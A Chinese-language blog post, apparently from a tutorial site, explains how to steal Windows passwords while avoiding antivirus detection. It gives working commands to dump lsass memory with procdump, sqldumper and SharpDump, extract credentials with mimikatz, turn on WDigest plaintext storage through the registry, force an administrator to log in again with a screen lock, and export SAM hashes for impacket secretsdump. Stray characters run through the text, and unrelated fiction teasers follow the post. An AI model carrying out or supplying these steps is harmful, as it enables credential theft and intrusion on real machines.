抓Windows密碼的幾種方式

目前大部分抓Windows密碼的工具都會被殺軟攔截饥脑,例如mimikatz,wce懦冰,pwdump等灶轰,下面介紹幾種具有一定免殺效果的抓密碼方式。

一刷钢、Procdump

Procdump是Windows工具包里的一款工具笋颤,由于有微軟的官方簽名,所以大部分殺軟不會查殺内地。
sysinternals工具包下載地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/

  1. 獲取內(nèi)存文件lsass.exe
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
  1. 將lsass.dmp下載到攻擊者的電腦上
  2. 使用本地的mimikatz.exe讀取lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
image.png

二椰弊、SqlDumper

如果目標(biāo)安裝了mssql,可以通過sqldumper.exe來dump lsass進(jìn)程瓤鼻,沒安裝也可以手動上傳秉版。
sqldumper的默認(rèn)路徑:C:\Program Files\Microsoft SQL Server\110\Shared

  1. 先找到lsass.exe的進(jìn)程id
tasklist|findstr "lsass.exe"
  1. 導(dǎo)出dmp文件
sqldumper.exe <pid> 0 0x01100
  1. 將導(dǎo)出的SQLDmpr0001.mdmp下載到攻擊者的電腦上
  2. 使用本地的mimikatz.exe進(jìn)行讀取
 mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"
image.png

三、SharpDump

體積小巧(不到10KB)茬祷,便于自己做免殺處理清焕,下載地址:
https://github.com/GhostPack/SharpDump

  1. 首先需要使用vs編譯成exe文件
image.png
  1. 把lsass.exe進(jìn)程數(shù)據(jù)導(dǎo)出來
C:\Users\Administrator\Desktop>SharpDump.exe
image.png
  1. dump的文件是 bin 后綴,拖到本地機(jī)器上以后祭犯,先重命名為 zip 后綴秸妥,然后解壓
  2. 使用本地的mimikatz進(jìn)行讀取
mimikatz.exe "sekurlsa::minidump debug516" "sekurlsa::logonPasswords full" "exit"
image.png

四、Win10及2012以后的系統(tǒng)沃粗,如何抓取明文粥惧?

當(dāng)系統(tǒng)為win10或2012以上時,默認(rèn)在Wdigest內(nèi)存中禁止保存明文密碼(hash可以抓到)最盅,可以通過修改注冊表的方式進(jìn)行繞過突雪。

  1. 修改注冊表
打開:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
關(guān)閉:
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
  1. 開啟 Wdigest Auth 后起惕,需要重新登錄才能抓到明文,可以使用強(qiáng)制鎖屏的方式咏删,讓管理員重新登錄惹想。
rundll32 user32.dll,LockWorkStation
  1. 登錄后,再使用Procdump獲取內(nèi)存lsass.exe中的信息督函,就可以得到明文了嘀粱。

說明:如果殺毒軟件有dump內(nèi)存文件保護(hù),則以上方式無法免殺辰狡。

補(bǔ)充:免殺抓hash

使用注冊表導(dǎo)出Hash锋叨,再通過impacket進(jìn)行離線讀取,實戰(zhàn)中大部分殺軟都不會攔截宛篇。

reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
python secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCAL
image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末悲柱,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子些己,更是在濱河造成了極大的恐慌,老刑警劉巖嘿般,帶你破解...
    沈念sama閱讀 217,734評論 6 505
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件段标,死亡現(xiàn)場離奇詭異,居然都是意外死亡炉奴,警方通過查閱死者的電腦和手機(jī)逼庞,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,931評論 3 394
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來瞻赶,“玉大人赛糟,你說我怎么就攤上這事≡已罚” “怎么了璧南?”我有些...
    開封第一講書人閱讀 164,133評論 0 354
  • 文/不壞的土叔 我叫張陵,是天一觀的道長师逸。 經(jīng)常有香客問我司倚,道長,這世上最難降的妖魔是什么篓像? 我笑而不...
    開封第一講書人閱讀 58,532評論 1 293
  • 正文 為了忘掉前任动知,我火速辦了婚禮,結(jié)果婚禮上员辩,老公的妹妹穿的比我還像新娘盒粮。我一直安慰自己,他們只是感情好奠滑,可當(dāng)我...
    茶點故事閱讀 67,585評論 6 392
  • 文/花漫 我一把揭開白布丹皱。 她就那樣靜靜地躺著妒穴,像睡著了一般。 火紅的嫁衣襯著肌膚如雪种呐。 梳的紋絲不亂的頭發(fā)上宰翅,一...
    開封第一講書人閱讀 51,462評論 1 302
  • 那天,我揣著相機(jī)與錄音爽室,去河邊找鬼汁讼。 笑死,一個胖子當(dāng)著我的面吹牛阔墩,可吹牛的內(nèi)容都是我干的嘿架。 我是一名探鬼主播,決...
    沈念sama閱讀 40,262評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼啸箫,長吁一口氣:“原來是場噩夢啊……” “哼耸彪!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起忘苛,我...
    開封第一講書人閱讀 39,153評論 0 276
  • 序言:老撾萬榮一對情侶失蹤蝉娜,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后扎唾,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體召川,經(jīng)...
    沈念sama閱讀 45,587評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,792評論 3 336
  • 正文 我和宋清朗相戀三年胸遇,在試婚紗的時候發(fā)現(xiàn)自己被綠了荧呐。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 39,919評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡纸镊,死狀恐怖倍阐,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情逗威,我是刑警寧澤峰搪,帶...
    沈念sama閱讀 35,635評論 5 345
  • 正文 年R本政府宣布,位于F島的核電站凯旭,受9級特大地震影響罢艾,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜尽纽,卻給世界環(huán)境...
    茶點故事閱讀 41,237評論 3 329
  • 文/蒙蒙 一咐蚯、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧弄贿,春花似錦春锋、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,855評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽侧馅。三九已至,卻和暖如春呐萌,著一層夾襖步出監(jiān)牢的瞬間馁痴,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,983評論 1 269
  • 我被黑心中介騙來泰國打工肺孤, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留罗晕,地道東北人。 一個月前我還...
    沈念sama閱讀 48,048評論 3 370
  • 正文 我出身青樓赠堵,卻偏偏與公主長得像小渊,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子茫叭,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,864評論 2 354

推薦閱讀更多精彩內(nèi)容